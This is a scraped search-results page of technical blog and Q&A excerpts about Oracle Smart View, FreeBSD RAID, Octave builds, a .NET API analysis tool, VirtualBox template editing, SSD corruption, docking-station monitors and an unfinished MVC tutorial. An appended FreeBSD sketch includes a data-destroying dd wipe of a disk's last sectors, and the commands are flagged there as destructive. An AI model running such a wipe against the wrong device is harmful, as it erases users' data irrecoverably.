Search Results

Search found 906 results on 37 pages for 'rebuild'.

Page 34/37

  • Integrating Oracle Hyperion Smart View Data Queries with MS Word and Power Point

    - by Andreea Vaduva
    Most Smart View users probably appreciate that they can use just one add-in to access data from the different sources they might work with, like Oracle Essbase, Oracle Hyperion Planning, Oracle Hyperion Financial Management and others. But not all of them are aware of the options to integrate data analyses not only in Excel, but also in MS Word or Power Point. While in the past, copying and pasting single numbers or tables from a recent analysis in Excel made the pasted content a static snapshot, copying so-called Data Points now creates dynamic, updateable references to the data source. It also provides additional nice features, which can make life easier and less stressful for Smart View users.

    So, how does this option work? After building an ad-hoc analysis with Smart View as usual in an Excel worksheet, any area including data cells/numbers from the database can be highlighted in order to copy data points - even single data cells only.

    TIP: It is not necessary to highlight and copy the row or column descriptions.

    Next, from the Smart View ribbon select Copy Data Point. Then switch to the Word or Power Point document into which the selected content should be copied. Note that in these Office programs you will find a menu item Smart View; from it select the Paste Data Point icon. The copied details from the Excel report will be pasted, but showing #NEED_REFRESH in the data cells instead of the original numbers. After clicking the Refresh icon on the Smart View menu the data will be retrieved and displayed. (Maybe at that moment a login window pops up and you need to provide your credentials.) It works in the same way if you just copy one single number without any row or column descriptions, for example in order to incorporate it into a continuous text: Before refresh: After refresh:

    From now on, for any subsequent updates of the data shown in your documents you only need to refresh data by clicking the Refresh button on the Smart View menu, without copying and pasting the context or content again.

    As you might realize when trying out this feature on your own, there won’t be any Point of View shown in the Office document. Also, you have seen in the example, where only a single data cell was copied, that there aren’t any member names or row/column descriptions copied, which are usually required in an ad-hoc report in order to define exactly where data comes from or how data is queried from the source. Well, these definitions are not visible, but they are transferred to the Word or Power Point document as well. They are stored in the background for each individual data cell copied and can be made visible by double-clicking the data cell as shown in the following screen shot (which is taken from another context).

    So for each cell/number the complete connection information is stored along with the exact member/cell intersection from the database. And that’s not all: you now have the chance to exchange the members originally selected in the Point of View (POV) in the Excel report. Remember, at that time we had the following selection:

    By selecting the Manage POV option from the Smart View menu in Word or Power Point…

    … the following POV Manager – Queries window opens:

    You can now change your selection for each dimension from the original POV by either double-clicking the dimension member in the lower right box under POV: or by selecting the Member Selector icon on the top right hand side of the window.
After confirming your changes you need to refresh your document again. Be aware, that this will update all (!) numbers taken from one and the same original Excel sheet, even if they appear in different locations in your Office document, reflecting your recent changes in the POV. TIP Build your original report already in a way that dimensions you might want to change from within Word or Power Point are placed in the POV. And there is another really nice feature I wouldn’t like to miss mentioning: Using Dynamic Data Points in the way described above, you will never miss or need to search again for your original Excel sheet from which values were taken and copied as data points into an Office document. Because from even only one single data cell Smart View is able to recreate the entire original report content with just a few clicks: Select one of the numbers from within your Word or Power Point document by double-clicking.   Then select the Visualize in Excel option from the Smart View menu. Excel will open and Smart View will rebuild the entire original report, including POV settings, and retrieve all data from the most recent actual state of the database. (It might be necessary to provide your credentials before data is displayed.) However, in order to make this work, an active online connection to your databases on the server is necessary and at least read access to the retrieved data. But apart from this, your newly built Excel report is fully functional for ad-hoc analysis and can be used in the common way for drilling, pivoting and all the other known functions and features. So far about embedding Dynamic Data Points into Office documents and linking them back into Excel worksheets. You can apply this in the described way with ad-hoc analyses directly on Essbase databases or using Hyperion Planning and Hyperion Financial Management ad-hoc web forms. If you are also interested in other new features and smart enhancements in Essbase or Hyperion Planning stay tuned for coming articles or check our training courses and web presentations. You can find general information about offerings for the Essbase and Planning curriculum or other Oracle-Hyperion products here (please make sure to select your country/region at the top of this page) or in the OU Learning paths section , where Planning, Essbase and other Hyperion products can be found under the Fusion Middleware heading (again, please select the right country/region). Or drop me a note directly: [email protected] . About the Author: Bernhard Kinkel started working for Hyperion Solutions as a Presales Consultant and Consultant in 1998 and moved to Hyperion Education Services in 1999. He joined Oracle University in 2007 where he is a Principal Education Consultant. Based on these many years of working with Hyperion products he has detailed product knowledge across several versions. He delivers both classroom and live virtual courses. His areas of expertise are Oracle/Hyperion Essbase, Oracle Hyperion Planning and Hyperion Web Analysis.  

    Read the article

  • Cannot create zpool, how to get rid of intel raid volume?

    - by nagylzs
    This is a FreeBSD 9.1 amd64 computer. It has 5 disks installed. The ada0 and ada1 disks are used with a hw raid to provide the root filesystem:

        root@gw:/home/gandalf # ls /dev | grep ada
        ada0
        ada1
        ada2
        ada3
        ada4
        root@gw:/home/gandalf # zpool status
          pool: zroot
         state: ONLINE
          scan: none requested
        config:

                NAME          STATE     READ WRITE CKSUM
                zroot         ONLINE       0     0     0
                  raid/r0s1a  ONLINE       0     0     0

        errors: No known data errors

    I want to create a raidz pool for the remaining disks:

        root@gw:/home/gandalf # zpool create -f data raidz1 ada2 ada3 ada4
        cannot create 'data': one or more devices is currently unavailable
        root@gw:/home/gandalf # dmesg | grep ada2
        ada2 at ata4 bus 0 scbus6 target 0 lun 0
        ada2: <WDC WD20EARS-00MVWB0 51.0AB51> ATA-8 SATA 2.x device
        ada2: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes)
        ada2: 1907729MB (3907029168 512 byte sectors: 16H 63S/T 16383C)
        ada2: Previously was known as ad16
        root@gw:/home/gandalf # dmesg | grep ada3
        ada3 at ata5 bus 0 scbus7 target 0 lun 0
        ada3: <SAMSUNG HD103UJ 1AA01118> ATA-7 SATA 2.x device
        ada3: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes)
        ada3: 953868MB (1953523055 512 byte sectors: 16H 63S/T 16383C)
        ada3: Previously was known as ad18
        GEOM_RAID: Intel-fb8732fa: Disk ada3 state changed from NONE to ACTIVE.
        GEOM_RAID: Intel-fb8732fa: Subdisk Volume0:0-ada3 state changed from NONE to ACTIVE.
        root@gw:/home/gandalf # dmesg | grep ada4
        ada4 at ata6 bus 0 scbus8 target 0 lun 0
        ada4: <TOSHIBA DT01ACA100 MS2OA750> ATA-8 SATA 3.x device
        ada4: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes)
        ada4: 953869MB (1953525168 512 byte sectors: 16H 63S/T 16383C)
        ada4: Previously was known as ad20
        root@gw:/home/gandalf # dmesg | grep GEOM_RAID

    Aha, so ada3 is already part of another raid volume? Let's see:

        root@gw:/home/gandalf # dmesg | grep GEOM_RAID
        GEOM_RAID: SiI-130628113902: Array SiI-130628113902 created.
        GEOM_RAID: SiI-130628113902: Disk ada0 state changed from NONE to ACTIVE.
        GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 state changed from NONE to STALE.
        GEOM_RAID: SiI-130628113902: Disk ada1 state changed from NONE to ACTIVE.
        GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:0-ada1 state changed from NONE to STALE.
        GEOM_RAID: SiI-130628113902: Array started.
        GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:0-ada1 state changed from STALE to ACTIVE.
        GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 state changed from STALE to RESYNC.
        GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 rebuild start at 0.
        GEOM_RAID: SiI-130628113902: Volume SiI Raid1 Set state changed from STARTING to SUBOPTIMAL.
        GEOM_RAID: SiI-130628113902: Provider raid/r0 for volume SiI Raid1 Set created.
        GEOM_RAID: Intel-fb8732fa: Array Intel-fb8732fa created.
        GEOM_RAID: Intel-fb8732fa: Force array start due to timeout.
        GEOM_RAID: Intel-fb8732fa: Disk ada3 state changed from NONE to ACTIVE.
        GEOM_RAID: Intel-fb8732fa: Subdisk Volume0:0-ada3 state changed from NONE to ACTIVE.
        GEOM_RAID: Intel-fb8732fa: Array started.
        GEOM_RAID: Intel-fb8732fa: Volume Volume0 state changed from STARTING to DEGRADED.
        GEOM_RAID: Intel-fb8732fa: Provider raid/r1 for volume Volume0 created.
        root@gw:/home/gandalf #

    Yes, indeed. I want to get rid of raid/r1 completely. However, the controller was already set to "IDE" mode in the BIOS, so why is it creating a raid volume? I have also tried overwriting the first 16k of data on ada3 and rebooting the computer, but it did not help. How can I delete /dev/raid/r1?

        root@gw:/home/gandalf # graid status
           Name   Status  Components
        raid/r0  SUBOPTIMAL  ada0 (ACTIVE (RESYNC 4%))
                             ada1 (ACTIVE (ACTIVE))
        raid/r1  DEGRADED  ada3 (ACTIVE (ACTIVE))
        root@gw:/home/gandalf # graid delete raid/r1
        graid: Array 'raid/r1' not found.
        root@gw:/home/gandalf # graid delete /dev/raid/r1
        graid: Array '/dev/raid/r1' not found.
        root@gw:/home/gandalf #

    Thanks
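    Not part of the original question, but a hedged sketch of the usual way out: graid(8) addresses arrays by the metadata name shown in dmesg (Intel-fb8732fa here), not by the /dev/raid/r1 provider path, and the Intel/SiI metadata lives in the last sectors of the disk rather than the first 16k. Treat the commands below as an assumption-laden sketch and check graid(8) before running them; the dd line is destructive by design.

        # sketch only - array and device names taken from the dmesg output above
        graid delete Intel-fb8732fa        # delete the array itself, clearing its metadata
        # or just pull ada3 out of the array and erase its metadata:
        graid remove Intel-fb8732fa ada3
        # (graid stop Intel-fb8732fa only detaches it until the next metadata taste)

        # brute-force fallback: wipe the tail of ada3, where the Intel metadata sits
        # (destroys the last ~1 MB of a disk you intend to reuse anyway)
        dd if=/dev/zero of=/dev/ada3 bs=512 seek=1953521007 count=2048

        # some releases also let you disable graid tasting entirely in /boot/loader.conf:
        #   kern.geom.raid.enable="0"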

    Read the article

  • In what (small) ways can I modify Octave's compile options to enhance it without breaking it?

    - by irrational John
    If the title to this question seems a bit vague, I am sorry. But I wasn't sure how to distill what I am attempting to do into a single sentence. A few weeks back I learned that I could build and install recent releases of Octave on an Ubuntu 12.04 system by following the steps below. Install the tools needed to compile, link, and run octave. For Ubuntu the commands below have worked for me. sudo apt-get build-dep octave3.2 sudo apt-get install build-essential gnuplot gtk2-engines-pixbuf sudo apt-get install libfontconfig-dev bison Next, download the source code for an Octave release from the Gnu Project Archives for Octave and unpack the archive into a folder on your system. Use the commands below to build, check, and install octave. ./configure make make check sudo make install Unfortunately it turns out that the above builds an Octave that contains all the debugging symbol tables. The object files alone are huge taking up around 1.7 GB. The current Octave documentation suggests To compile without debugging symbols try the command make CFLAGS=-O CXXFLAGS=-O LDFLAGS= instead of just make. However, when I tried this it did not work. The -g option was still used for the compiles. For the heck of it I instead tried ./configure CFLAGS=-O CXXFLAGS=-O and this did work. (Instead of ~1.7GB the result of the build now takes up around 253MB). My questions are Is this actually the correct (recommended?) method to use to compile Octave without debugging symbols (i.e. without -g)? How would I compile Octave so it uses x86_64 rather than x86? Note: I am not asking how to compile Octave to use the (experimental) 64-bit integers for array dimensions. I just want to allow the compiler to use the extra registers and word sizes available when an app runs in 64-bit mode. Is a (more) complete list available for the directives used with the Octave Makefile? I have only seen make, make check, and make install documented. But apparently make distclean is also allowed. (It removes the compilation results so you can do a complete rebuild of everything.) I'm wondering what else might be available. FWIW, I have tried using ./configure CFLAGS="-O3 -mtune=core2 -m64" CXXFLAGS="-O3 -mtune=core2 -m64" and, surprisingly, it not only appeared to build, but also ran and passed the make check tests. The ./configure script even gave me the (deceptively?) reassuring message "Octave is now configured for x86_64-unknown-linux-gnu". But of course that's not the same thing as saying it actually "works". Is there a recommended way to enable Octave to run as an x86_64 app? I have also tried looking inside the Octave Makefile to see if I could decipher what command line directives it accepts. I got nowhere. I have not a single clue as to how that Makefile does whatever it is that it does.
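    For reference, a hedged recap of what worked for the questioner plus the standard GNU make targets (Octave's build system is autotools-based); the exact flags are assumptions to adapt, not an official recommendation.

        # the configure-time flags are what actually suppressed -g for the questioner;
        # -m64 is already the default on a native x86_64 toolchain, so it is optional
        ./configure CFLAGS="-O2 -m64" CXXFLAGS="-O2 -m64"
        make
        make check
        sudo make install

        # other targets any autotools-generated Makefile understands
        make clean        # drop objects but keep the configure results
        make distclean    # drop everything configure generated (forces a full rebuild)
        make uninstall    # remove a previously installed build from the same source tree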

    Read the article

  • ApiChange Is Released!

    - by Alois Kraus
    I have been working on a little tool to simplify my life, and perhaps yours as a developer as well. It is basically a command line tool that allows you to execute queries on your compiled .NET code base. The main purpose is to find out how big the impact of an api change would be if you changed this or that. Now you can do high level operations like:

    Diff public types for breaking changes.
    Who uses a method?
    Who uses a type?
    Who implements an interface?
    Who references me?
    What format has the binary (32/64, Managed C++, Pure IL, Unmanaged)?
    Search for all event subscribers and unsubscribers.

    A unique feature is to check for event subscription imbalances. Forgotten event subscriptions are the 90% cause of managed memory leaks. It is done at a per class level. If one class does subscribe to one event more often than it does unsubscribe, it is treated as a possible event subscription imbalance. Another unique ability is to search for users of string literals, which allows you to track users of a string constant, which is not possible otherwise. For incremental builds the ShowRebuildTargets command can be used to identify the dependent targets that need a rebuild after you have compiled one assembly. It has some heuristics in place to determine the impact of breaking changes and finds out which targets need to be recompiled as well. It has a ton of other features and an API to access these things programmatically, so you can build upon these simple queries and create even better tools. Perhaps we get a Visual Studio plug-in? You can download it from CodePlex here. It works via XCopy deployment. Simply let it run and check the command line help out.

    The best feature in my opinion is that the output of nearly all commands can be piped to Excel for further analysis. Since it also reads the pdbs, it can show you the source file name and line number for all matches. The following picture shows the output of a -WhousesType query. The following command checks where types from BaseLibraryV1.dll are used inside DependantLibV1.dll. All matches are printed out with the reason and matching item along with file and line number. There is even a hyperlink to the match which will open Visual Studio.

        ApiChange -whousestype "*" BaseLibraryV1.dll -in DependantLibV1.dll -excel

    The "*" is the actual query, which means all types. The syntax is the same as in C#, just that placeholders are allowed ;-). More info can be found in the Codeplex documentation.

    The tool was developed in a TDD style manner, which means that it is heavily tested and already used by a quite large user base inside the company I work for. Luckily for you I got the permission to make it public, so you can take advantage of it. It is fully instrumented with tracing. If you find bugs, simply add the -trace command line switch to find out what is failing and send me the output.

    How is it done? Your first guess might be that it uses reflection. Wrong. It is based on Mono Cecil, a free IL parser with a fantastic API to access all internals of a managed assembly. The speed is awesome, and to make it even faster I made the tool heavily multi-threaded. The query above executed in 1.8s with the Excel output. On a rather slow machine I can analyze over 1500 assemblies in less than 40s with a very low memory consumption. The true power of Mono Cecil is that I can load an assembly like any other data file.
I have no problems unloading a file but if I would have used reflection I would need to unload a whole AppDomain just to get rid of one assembly in my memory. Just to give you a glimpse how ApiChange.Api.dll can be used I show you one of the unit tests:           public void Can_Find_GenericMethodInvocations_With_Type_Parameters()         { // 1. Create an aggregator to collect our matches             UsageQueryAggregator agg = new UsageQueryAggregator();   // 2. This is the type we want to search for. Load it via the type query             var decimalType = TypeQuery.GetTypeByName(TestConstants.MscorlibAssembly, "System.Decimal");   // 3. register the type query which searches for uses of the Decimal type             new WhoUsesType(agg, decimalType);   // 4. Search for all users of the Decimal type in the DependandLibV1Assembly             agg.Analyze(TestConstants.DependandLibV1Assembly);   // Extract matches and assert             Assert.AreEqual(2, agg.MethodMatches.Count, "Method match count");             Assert.AreEqual("UseGenericMethod", agg.MethodMatches[0].Match.Name);             Assert.AreEqual("UseGenericMethod", agg.MethodMatches[1].Match.Name);         } Many thanks go from here to Jb Evian for the creation of Mono.Cecil. Without this fantastic piece of code it would have been much much harder. There are other options around like the Common Compiler Infrastructure  Metadata Api which should do the same thing but it was not a real option since the Microsoft reader did fail on even simple assemblies (at least in September 2009 this was the case). Besides this I found the CCI Apis much harder to use. The only real competitor was Reflector which does support many things but does not let me access his cool high level analyze commands. So I decided to dig into the IL specs and as a result you can query your compiled binaries from the command line or programmatically. The best thing is you try it out for yourself and give me some feedback what you miss. If you want to contribute or have a cool idea what should be added drop me a mail at A Kraus1@___No [email protected]. There is much more inside the tool I did not talk about it (yet).

    Read the article

  • Exalogic 2.0.1 Tea Break Snippets - Creating a ModifyJeOS VirtualBox

    - by The Old Toxophilist
    Following on from my previous blog entry "Modifying the Base Template" I decided to put together a quick blog to show how to create a small VirtualBox guest that can be used to execute ModifyJeOS and hence edit your templates. One of the main advantages of this is that templates can be created away from the Exalogic environment. For the guest OS I chose OEL 6u3 and decided to create it as a basic server because I did not require a graphical interface, but it's a simple change to create it with a GUI.

    Required Software

    VirtualBox.
    Oracle Enterprise Linux.

    Creating the VM

    I'll assume that the reader is experienced with VirtualBox and installing OEL and hence will make this section brief.

    Create VirtualBox Guest

    Create a new VirtualBox guest and select Oracle Linux 64 bit. Follow through the create process and select Dynamic Disk Size and the default 12GB disk size. The actual image will be a lot smaller than this, but the OEL install will fail with insufficient disk space if you attempt a smaller size. Once the guest has been created, attach the previously downloaded OEL 6u3 iso to the cd drive and start the guest.

    Install OEL

    On starting the guest the system will boot off the associated OEL 6u3 iso and take you through the standard installation process. Select all the appropriate information, but when you reach the installation type select Basic Server because we do not need the additional packages and only need access through the command line interface. Complete the installation and reboot the guest. At this point we now have a basic OEL server running.

    Installing Guest Add-ons

    Before we can easily access the guest we will need to add the VirtualBox guest add-ons. These will provide better keyboard and mouse integration and allow access to the shared folders on the host machine. Before we can do this we will need to do the following:

    Enable networking.
    Install additional rpms.

    To enable the networking (eth0), which appears to be disabled by default, we can execute:

        ifup eth0

    This will start the eth0 connection, but once the guest is rebooted the network will be down again. To resolve this you will need to edit the /etc/sysconfig/network-scripts/ifcfg-eth0 file and change the ONBOOT parameter to "yes". Now that we have enabled the network, we will need to install a number of additional rpms.
    First we will need to configure the yum repository as follows:

        [ol6_latest]
        name=Oracle Linux $releasever Latest ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/latest/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=1

        [ol6_ga_base]
        name=Oracle Linux $releasever GA installation media copy ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/0/base/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=0

        [ol6_u1_base]
        name=Oracle Linux $releasever Update 1 installation media copy ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/1/base/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=0

        [ol6_u2_base]
        name=Oracle Linux $releasever Update 2 installation media copy ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/2/base/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=0

        [ol6_u3_base]
        name=Oracle Linux $releasever Update 3 installation media copy ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/3/base/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=0

        [ol6_UEK_latest]
        name=Latest Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/latest/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=1

        [ol6_UEK_base]
        name=Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
        baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/base/$basearch/
        gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
        gpgcheck=1
        enabled=0

    Once the repository has been edited we will need to execute the following yum commands:

        yum update
        yum install gcc
        yum install kernel-uek-devel
        yum install kernel-devel
        yum install createrepo

    At this point we now have all the additional packages required to install the VirtualBox Guest Add-ons. So select Devices->Install Guest Additions on your running guest: This will simply place the VirtualBoxGuestAdditions.iso in the virtual cd and we will need to execute the following before we can run them.

        mkdir /media/cdrom
        mount -t iso9660 -o ro /dev/cdrom /media/cdrom
        cd /media/cdrom/
        ls
        ./VBoxLinuxAdditions.run

    This will initiate the install and kernel rebuild. What you will notice is that during the installation a Failed will be displayed, but this is simply because we have no graphical components. At this point the installation will also have added the vboxsf group to the system, and to access any shared folders the user we create will need to be a member of this group, so the next stage is to add the root user to this group as follows:

        usermod -G vboxsf root
        cat /etc/group
        cat /etc/passwd
        init 0

    Now simply shut down the guest and add the shared folder within your guest's settings.

    Install ModifyJeOS

    Once the shared folder has been added, restart the guest and change directory into the shared folder (/media/sf_<folder name>). For the next step I am assuming the ModifyJeOS rpms are located in the shared folder.
    We can simply execute:

        rpm -ivh ovm-modify-jeos-1.1.0-17.el5.noarch.rpm
        # Test with modifyjeos

    Using ModifyJeOS

    I have a modified MountSystemImg.sh script that should be copied into the /root/bin directory (you may need to create this), and from there it can be executed from any location:

    MountSystemImg.sh

        #!/bin/sh
        # The script assumes it's being run from the directory containing the System.img
        # Export for later i.e. during unmount
        export LOOP=`losetup -f`
        export SYSTEMIMG=/mnt/elsystem
        export TEMPLATEDIR=`pwd`
        # Make Temp Mount Directory
        mkdir -p $SYSTEMIMG
        # Create Loop for the System Image
        losetup $LOOP System.img
        kpartx -a $LOOP
        mount /dev/mapper/`basename $LOOP`p2 $SYSTEMIMG
        # Change Dir into mounted Image
        cd $SYSTEMIMG
        echo "######################################################################"
        echo "###                                                                ###"
        echo "### Starting Bash shell for editing. When completed log out to    ###"
        echo "### Unmount the System.img file.                                  ###"
        echo "###                                                                ###"
        echo "######################################################################"
        echo
        bash
        cd ~
        cd $TEMPLATEDIR
        umount $SYSTEMIMG
        kpartx -d $LOOP
        losetup -d $LOOP
        rm -rf $SYSTEMIMG

    This script will simply create a mount directory, mount the System.img and then start a new shell in the mounted directory. On exiting the shell it will unmount the System.img. It only requires that you execute the script in the directory containing the System.img. These can be created under the mounted shared directory. In the example below I have extracted the Base template within the shared folder and then renamed it OEL_40GB_ROOT before changing into that directory and executing the script.
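    A hedged usage sketch to tie this together; the shared-folder and template paths below are examples, not taken from the original screenshots.

        # run from the directory that holds the template's System.img
        cd /media/sf_Templates/OEL_40GB_ROOT     # example shared-folder path
        /root/bin/MountSystemImg.sh              # mounts System.img and drops you into a shell
        # ... edit the mounted image (you start inside /mnt/elsystem) ...
        exit                                     # leaving that shell unmounts and detaches the image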

    Read the article

  • Causes of sudden massive filesystem damage? ("root inode is not a directory")

    - by poolie
    I have a laptop running Maverick (very happily until yesterday), with a Patriot Torx SSD; LUKS encryption of the whole partition; one lvm physical volume on top of that; then home and root in ext4 logical volumes on top of that. When I tried to boot it yesterday, it complained that it couldn't mount the root filesystem. Running fsck, basically every inode seems to be wrong. Both home and root filesystems show similar problems. Checking a backup superblock doesn't help. e2fsck 1.41.12 (17-May-2010) lithe_root was not cleanly unmounted, check forced. Resize inode not valid. Recreate? no Pass 1: Checking inodes, blocks, and sizes Root inode is not a directory. Clear? no Root inode has dtime set (probably due to old mke2fs). Fix? no Inode 2 is in use, but has dtime set. Fix? no Inode 2 has a extra size (4730) which is invalid Fix? no Inode 2 has compression flag set on filesystem without compression support. Clear? no Inode 2 has INDEX_FL flag set but is not a directory. Clear HTree index? no HTREE directory inode 2 has an invalid root node. Clear HTree index? no Inode 2, i_size is 9581392125871137995, should be 0. Fix? no Inode 2, i_blocks is 40456527802719, should be 0. Fix? no Reserved inode 3 (<The ACL index inode>) has invalid mode. Clear? no Inode 3 has compression flag set on filesystem without compression support. Clear? no Inode 3 has INDEX_FL flag set but is not a directory. Clear HTree index? no .... Running strings across the filesystems, I can see there are what look like filenames and user data there. I do have sufficiently good backups (touch wood) that it's not worth grovelling around to pull back individual files, though I might save an image of the unencrypted disk before I rebuild, just in case. smartctl doesn't show any errors, neither does the kernel log. Running a write-mode badblocks across the swap lv doesn't find problems either. So the disk may be failing, but not in an obvious way. At this point I'm basically, as they say, fscked? Back to reinstalling, perhaps running badblocks over the disk, then restoring from backup? There doesn't even seem to be enough data to file a meaningful bug... I don't recall that this machine crashed last time I used it. At this point I suspect a bug or memory corruption caused it to write garbage across the disks when it was last running, or some kind of subtle failure mode for the SSD. What do you think would have caused this? Is there anything else you'd try?
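    Not advice from the original poster, just a cautious sketch of the "image it before fsck writes anything" route hinted at above; the device name is inferred from the fsck output and the 32768 backup-superblock location is only a common default for 4k-block ext4.

        # 1. unlock the LUKS/LVM stack as usual, then copy the damaged LV to spare storage
        ddrescue /dev/mapper/lithe_root /mnt/spare/lithe_root.img /mnt/spare/lithe_root.map
        # 2. attach the copy as a loop device and experiment only on that
        losetup -f --show /mnt/spare/lithe_root.img     # prints e.g. /dev/loop0
        # 3. read-only pass against a backup superblock before answering yes to anything
        e2fsck -n -b 32768 -B 4096 /dev/loop0
        # 4. since bad RAM is on the suspect list, run memtest86+ before trusting a rebuild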

    Read the article

  • Dell Latitude E6430 Docking Station + Dual Monitor + Laptop Screen Tri-Monitor setup

    - by Larry
    I have a company issued laptop and docking station as well as two monitors The specifications of the hardware are as follows; Laptop: Latitude E6430 BIOS: A02.00 Processor: i7-3720QM CPU @ 2.60 (8 CPUs) Memory: 4096MB RAM Page file: 1825MB used, 4793MB available DirectX 11 Display Driver/Chip: MVIDIA NVS 5200M DAC: Integrated RAMDAC Aprox Total Memory: 2376 (Above 3 details same for both displays) Current Display Mode (Display 1): 1600x900 Current Display Mode (Display 2): 1440x900 the docking station is a Dell Latitude E6420 Docking Station PR03X Port Replicator and I don't think the monitor model is particularly relevant to resolving this issue but they are both Acer V193Ws The story goes like this; the laptop works fine if I VGA one monitor into the laptop through the vga port on the back of the lefthand side of the laptop I can achieve dual monitor display fine (laptop screen + monitor) if I plug the laptop into the docking station and use the vga port in the back of the docking station I can dual monitor fine (laptop screen + monitor) if I plug the laptop into the docking station, the laptop's lefthand side VGA port no longer seems to function at all I've spoken to internal IT about this issue and they're going to get me some kind of VGA splitter or a DVI-VGA adapter to use with the docking station for the second Acer Monitor, but that isn't going to happen for a few days. So I guess what I'm wondering is; is there any way to continue to use the side VGA port on my laptop while using the docking station VGA port? and as a secondary 'followup' pending resolution of the initial issue with getting both monitors up and running (at the moment I have both monitors on my desk but am just using my laptop screen as one of my dual monitor display with one of the monitors [the one connected to dock]), is there any way to CONTINUE to use my laptop monitor to in effect have a triple monitor display (2 monitors + docked laptop)? I am wondering this because internal IT told me that they were aware of some issues with the particular display drivers in my box and triple monitor displays but weren't really going to look TOO much in-depth into that (which is perfectly understandable) since getting the adapter for the dual monitors up and running was the greater priority within their purview. So this is a two parter; Can I dual monitor using two vga cables with 1 docking station vga port and one laptop vga port? is there a setting that can be tweaked somewhere? because plugging the box into the station seems to make the side port stop working and... Is there any reasonably simple and cost-effective work around (e.g. I am find with shelling out maybe a few dollars out of my own pocket for some hardware or software to make my company box tri-display capable) but if this requires some extensive rebuild or new OSs or doing stuff to the BIOS I'd rather have a straight answer about this being untenable as a slight modification to a (once again) company laptop and stop wasting time looking into it Thanks! and please let me know if you guys need any more details (tech specs or something) to answer this question [EDIT] 2/10/2014 Just an update; turned out it really was just a hardware limitation issue. The old laptop just couldn't hack it. Got a new laptop with a better video card and different monitors from my company and am successfully using a triple display currently (2 monitors + laptop screen)

    Read the article

  • MVC Razor Engine For Beginners Part 1

    - by Humprey Cogay, C|EH, E|CSA
    I. What is MVC?
    a. http://www.asp.net/mvc/tutorials/older-versions/overview/asp-net-mvc-overview

    II. Software Requirements for this tutorial
    a. Visual Studio 2010/2012. You can get your free copy here Microsoft Visual Studio 2012
    b. MVC Framework
       Option 1 - Install using a standalone installer http://www.microsoft.com/en-us/download/details.aspx?id=30683
       Option 2 - Install using Web Platform Installer http://www.microsoft.com/web/handlers/webpi.ashx?command=getinstallerredirect&appid=MVC4VS2010_Loc

    III. Creating your first MVC4 Application
    a. On the Visual Studio click file new solution link
    b. Click Other Project Type>Visual Studio Solutions and on the templates window select blank solution and let us name our solution MVCPrimer.
    c. Now Click File>New and select Project
    d. Select Visual C#>Web> and select ASP.NET MVC 4 Web Application and Enter MyWebSite as Name
    e. Select Empty, Razor as view engine and uncheck Create a Unit test project
    f. You can now view a basic MVC 4 Application Structure on your solution explorer
    g. Now we will add our first controller by right clicking on the controllers folder on your solution explorer and select Add>Controller
    h. Change the name of the controller to HomeController and under the scaffolding options select Empty MVC Controller.
    i. You will now see a basic controller with an Index method that returns an ActionResult
    j. We will now add a new View Folder for our Home Controller. Right click on the views folder on your solution explorer and select Add> New Folder> and name this folder Home
    k. Add a new View by right clicking on Views>Home Folder and select Add View.
    l. Name the view Index, and select Razor(CSHTML) as View Engine, All checkbox should be unchecked for now and click add.
    m. Relationship between our HomeController and Home Views Sub Folder
    n. Add new HTML Contents to our newly created Index View
    o. Press F5 to run our MVC Application
    p. We will create our new model, Right click on the models folder of our solution explorer and select Add> Class.
    q. Let us name our class Customer
    r. Edit the Customer class with the following code
    s.
Open the HomeController by double clickin HomeController of our Controllers folder and edit the HomeControllerusing System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Mvc;   namespace MyWebSite.Controllers {     public class HomeController : Controller     {         //         // GET: /Home/           public ActionResult Index()         {             return View();         }           public ActionResult ListCustomers()         {             List<Models.Customer> customers = new List<Models.Customer>();               //Add First Customer to Our Collection             customers.Add(new Models.Customer()                     {                         Id = 1,                         CompanyName = "Volvo",                         ContactNo = "123-0123-0001",                         ContactPerson = "Gustav Larson",                         Description = "Volvo Car Corporation, or Volvo Personvagnar AB, is a Scandinavian automobile manufacturer founded in 1927"                     });                 //Add Second Customer to Our Collection             customers.Add(new Models.Customer()                     {                         Id = 2,                         CompanyName = "BMW",                         ContactNo = "999-9876-9898",                         ContactPerson = "Franz Josef Popp",                         Description = "Bayerische Motoren Werke AG,  (BMW; English: Bavarian Motor Works) is a " +                                       "German automobile, motorcycle and engine manufacturing company founded in 1917. "                     });                 //Add Third Customer to Our Collection             customers.Add(new Models.Customer()             {                 Id = 3,                 CompanyName = "Audi",                 ContactNo = "983-2222-1212",                 ContactPerson = "Karl Benz",                 Description = " is a multinational division of the German manufacturer Daimler AG,"             });               return View(customers);         }     } } t. Let us now create a view for this Class, But before continuing Press Ctrl + Shift + B to rebuild the solution, this will make the previously created model on the Model class drop down of the Add View 